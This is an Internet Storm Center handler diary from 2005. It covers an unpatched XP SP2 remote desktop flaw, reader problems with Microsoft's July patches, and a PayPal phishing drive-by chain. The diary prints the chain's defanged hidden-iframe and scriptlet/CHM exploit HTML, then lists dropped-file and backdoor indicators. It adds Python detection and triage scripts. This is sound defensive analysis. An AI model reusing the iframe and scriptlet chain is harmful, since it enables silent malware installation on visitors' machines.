
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-14 InfoSec Handlers Diary Blog



Update: New Windows XP SP2 vulnerability; MS Patches reports; Bad, Bad Spam...

Published: 2005-07-14
Last Updated: 2005-07-15 04:09:46 UTC
by Pedro Bueno (Version: 1)

Update: New Windows XP SP2 vulnerability

badpack3t announced the discovery of a so far unpatched vulnerability in Windows XP SP2. The vulnerability is due to a flaw in the remote desktop assistant. This service is NOT FIREWALLED in XP SP2's default firewall configuration.

badpack3t was able to cause a blue screen. However, there is a chance that
this could be used to execute code remotely.

RDP uses port 3389 TCP. In one MSFT , 3389 UDP is mentioned, but we could not verify that RDP listens on 3389 UDP.

Our sensors did see a slight increase in port 3389 TCP scanning starting about two weeks ago. The increase is small, and somewhat consistent with a small number of new scanners.

Other references to this issue:

http://secunia.com/advisories/16071/

https://www.immunitysec.com/pipermail/dailydave/2005-July/002185.html

MS Patches reports

Yesterday, Tom asked for reports about the MS July patches. Below is a summary of the reports received, plus some opinions about the W2k Security Rollup for SP4. Thank you to all who sent reports!

* Citrix problems with the W2k security rollup patches.

A reader reported that "...After applying the update on two separate servers, authenticated users connecting to the servers through a Windows 2000 Server VPN connection are unable to run published applications. After removing the security rollup, full functionality is restored."

After some email exchange, we found that Citrix has published a KB article about this: Document ID CTX107051. The reader said he will try the workaround.

* Panda AV problems after the patches were applied.

A reader reported that "...After applying the patches, some components (either the firewall or protection against unknown threats) on Panda Platinum 2005 Internet Security (9.02.01) stopped working. This happened on my Win2000 laptop (fully patched) and on several WinXP Pro boxes. The solution was to completely uninstall Panda & then re-install it."

* Problems with v6 downloading patches...

A reader reported that when visiting the Windows Update website, he was prompted to upgrade the Windows Update Agent. He did that, and afterwards he couldn't connect to any update server. The solution: "...I found that re-installing Microsoft XML parser 3.0 SP4 fixed the issue. Going to v4.windowsupdate.microsoft.com generated an error, but provided the info on fixing this. This fix allowed for a reinstall of Windows Update Agent."

* Another reader reported a crash of explorer.exe when trying to view a video folder. It happened after he installed MS05-036.






Bad, Bad Phishing/Spam...

We received today a report of a PayPal phishing attempt. While all the other links in the HTML went to PayPal, one did not. That link is the one below:

http : //www.onlinepaymentspaypaleio[ SNIP ]we.[DOMAIN].org//Trants/Bin/kdejidiuehyguyuwdheoirejfrufhrfyrgufrfgruhrfuherif/oudiheiudhedygdueydguwedyehdieudgwuydew/doiejduhdiudhediwuedhwei.html

Quite a strange domain, huh? And what about an HTML file called doiejduhdiudhediwuedhwei.html?




::doiejduhdiudhediwuedhwei.html::

#html#

#body#

#iframe src="http : //www.i47324876348731[ SNIP ]45237463254734823746823467.biz" width=0 height=0 border=0##/iframe#

#/body#

#/html#



Another very interesting domain...

This would load the iframe from the domain above. The content of its index.html file is below:






::index.html::





#html#

#head#

#/head#

#body#

#iframe width=0 border=0 height=0 src="exploit.htm"##/iframe#

#iframe width=0 border=0 height=0 src="ani.html"##/iframe#

#iframe width=0 border=0 height=0 src="new/index.html"##/iframe#

#/body#

#/html#


More iframes...what a surprise...

The content? (PS. I had to change some stuff below, because it was triggering some AV)


#textarea id="code" style="display:none;"#
<object data="&#109;[SNIP]:[SNIP]!${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"##/object#

#/textarea#



#script language="javascript"#

document//write(code//value//replace(/\${PATH}/g,location//href//
substring(0,location//href//indexOf('exploit.htm'))));

#/script#
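The three pages above share one pattern: invisible iframes chaining to further pages, and a hidden textarea whose markup is written into the document after a ${PATH} placeholder is replaced with the current page's base URL. The following is an added example, not code from the diary or from the kit it describes, showing how a defender can flag that pattern statically with the Python standard library. The two HTML samples are constructed to mirror the structure of index.html and exploit.htm shown above; the x-placeholder: scheme and the phish.invalid host are stand-ins, not the real values.

```python
"""Static checks for the hidden-iframe / scriptlet redirection chain shown above.

Added example, not code from the diary or the phishing kit. Standard library only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin


class HiddenContentScanner(HTMLParser):
    """Collect 0x0 / display:none iframes, x-scriptlet objects, hidden textareas and scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []           # (kind, detail) tuples in document order
        self.textarea_payloads = {}  # textarea id -> raw inner markup
        self.scripts = []            # inline script bodies
        self._textarea = None        # id of the hidden textarea being read
        self._in_script = False

    @staticmethod
    def _hidden(a):
        size_zero = (a.get("width") or "").strip() == "0" or (a.get("height") or "").strip() == "0"
        style = (a.get("style") or "").replace(" ", "").lower()
        return size_zero or "display:none" in style or "visibility:hidden" in style

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if self._textarea is not None:  # keep markup nested inside a hidden textarea verbatim
            self.textarea_payloads[self._textarea] += self.get_starttag_text()
        if tag == "iframe" and self._hidden(a):
            self.findings.append(("hidden_iframe", a.get("src") or ""))
        elif tag == "object":
            data = a.get("data") or ""
            if (a.get("type") or "").lower() == "text/x-scriptlet" or ".chm::" in data:
                self.findings.append(("scriptlet_object", data))
        elif tag == "textarea" and self._hidden(a):
            self._textarea = a.get("id") or ""
            self.textarea_payloads.setdefault(self._textarea, "")
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "textarea":
            self._textarea = None
        elif tag == "script":
            self._in_script = False
        elif self._textarea is not None:
            self.textarea_payloads[self._textarea] += "</%s>" % tag

    def handle_data(self, data):
        if self._textarea is not None:
            self.textarea_payloads[self._textarea] += data
        if self._in_script:
            self.scripts[-1] += data


# The kit's idiom: document.write(<textarea id>.value.replace(...))
DOC_WRITE_RE = re.compile(r"document\.write\(\s*(\w+)\.value\b")


def expand_path_template(payload, page_url, marker="exploit.htm"):
    """Mirror the kit's ${PATH} substitution so the final object URL can be logged.

    JS substring(0, indexOf(marker)) yields "" when the marker is absent
    (indexOf returns -1, which substring clamps to 0), so do the same here.
    """
    idx = page_url.find(marker)
    base = page_url[:idx] if idx >= 0 else ""
    return payload.replace("${PATH}", base)


def scan_html(html, page_url):
    """Return findings for one page, with iframe targets resolved against page_url."""
    p = HiddenContentScanner()
    p.feed(html)
    p.close()
    findings = [(k, urljoin(page_url, v) if k == "hidden_iframe" else v) for k, v in p.findings]
    for body in p.scripts:
        m = DOC_WRITE_RE.search(body)
        if m and m.group(1) in p.textarea_payloads:
            findings.append(("textarea_document_write", m.group(1)))
            expanded = expand_path_template(p.textarea_payloads[m.group(1)], page_url)
            findings.append(("expanded_payload", expanded.strip()))
    return findings


# Constructed samples mirroring the diary's index.html and exploit.htm (not the real pages).
SAMPLE_INDEX = r"""<html><head></head><body>
<iframe width=0 border=0 height=0 src="exploit.htm"></iframe>
<iframe width=0 border=0 height=0 src="ani.html"></iframe>
<iframe width=0 border=0 height=0 src="new/index.html"></iframe>
</body></html>"""

SAMPLE_EXPLOIT = r"""<textarea id="code" style="display:none;">
<object data="x-placeholder:${PATH}/exploit.chm::/exploit.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));
</script>"""

if __name__ == "__main__":
    for url, doc in (("http://phish.invalid/index.html", SAMPLE_INDEX),
                     ("http://phish.invalid/exploit.htm", SAMPLE_EXPLOIT)):
        for kind, detail in scan_html(doc, url):
            print(url, kind, detail)
```

Resolving the iframe targets against the page URL gives the full chain to block or fetch for analysis, and expanding ${PATH} the way the kit's own script does records the object URL the browser would actually have requested.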


The new/index.html will try to download a file called loader.exe, a DOWNloader.exe trojan...:)

This loader.exe will try to download a file called f0001.exe.

This one will create the following files:

* C:\WINDOWS\SYSTEM\winldra.exe
* C:\WINDOWS\netdx.dat
* C:\WINDOWS\dvpd.dll
* C:\WINDOWS\TEMP\fe43e701.htm

along with several Registry keys...

It will also open a backdoor on port 9125.

This kind of virus usually opens a proxy and an FTP server, and has keylogging capabilities...

Bad thing...as I write this, it is only detected by 3 of the 22 AV engines on VirusTotal so far...
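With AV coverage that thin, a host check against the indicators named above is worth more than a signature. The following is an added example, not code from the diary or from any vendor tool: it takes the dropped-file paths and the port 9125 backdoor as indicators, parses Windows `netstat -an` text, and reports what matches. The same socket parser answers the question from the RDP section (is anything bound to 3389/tcp or 3389/udp?). The netstat text and the fake file listing are constructed sample data; run without the `exists` override it checks the real filesystem.

```python
"""Host-side triage for the indicators in this diary.

Added example, not part of the diary. Indicators come from the text above;
the netstat output and file listing used for the demo are constructed.
"""
import os
import re

# Indicators listed in the diary.
DROPPED_FILES = [
    r"C:\WINDOWS\SYSTEM\winldra.exe",
    r"C:\WINDOWS\netdx.dat",
    r"C:\WINDOWS\dvpd.dll",
    r"C:\WINDOWS\TEMP\fe43e701.htm",
]
BACKDOOR_PORT = 9125
RDP_PORT = 3389

# One line of `netstat -an` output, e.g.
#   TCP    0.0.0.0:9125           0.0.0.0:0              LISTENING
#   UDP    0.0.0.0:445            *:*
NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+\S+(?:\s+(\S+))?", re.I)


def bound_sockets(netstat_text):
    """Return {(proto, port)} for TCP sockets in LISTENING state and all UDP sockets."""
    sockets = set()
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, port, state = m.group(1).upper(), int(m.group(3)), (m.group(4) or "").upper()
        if proto == "UDP" or state == "LISTENING":
            sockets.add((proto, port))
    return sockets


def normalize(path):
    """Case-insensitive, backslash-only form so indicator paths compare reliably."""
    return path.replace("/", "\\").lower()


def present_files(candidates, exists=os.path.exists):
    """Which indicator files exist; `exists` is injectable so the demo runs offline."""
    return [p for p in candidates if exists(p)]


def triage(netstat_text, exists=os.path.exists):
    """Combine file and socket indicators into one verdict for this host."""
    sockets = bound_sockets(netstat_text)
    found = present_files(DROPPED_FILES, exists)
    backdoor = ("TCP", BACKDOOR_PORT) in sockets
    return {
        "files": found,
        "backdoor_listener": backdoor,
        "rdp_tcp": ("TCP", RDP_PORT) in sockets,
        "rdp_udp": ("UDP", RDP_PORT) in sockets,
        "suspicious": bool(found) or backdoor,
    }


# Constructed sample data (not from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9125           0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1043        198.51.100.5:80        ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""
SAMPLE_FILESYSTEM = {
    normalize(r"C:\WINDOWS\SYSTEM\winldra.exe"),
    normalize(r"C:\WINDOWS\netdx.dat"),
    normalize(r"C:\WINDOWS\system32\kernel32.dll"),
}


def sample_exists(path):
    """Stand-in for os.path.exists over the constructed listing."""
    return normalize(path) in SAMPLE_FILESYSTEM


if __name__ == "__main__":
    print(triage(SAMPLE_NETSTAT, exists=sample_exists))
```

A listener on 9125 is treated as a stronger signal than a single file because the file names are easy to change between builds while the open port is what the operator needs to reach the host.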


___________________________________________________________________________

Handler on Duty: Pedro Bueno ( pbueno #AT# isc.sans.org )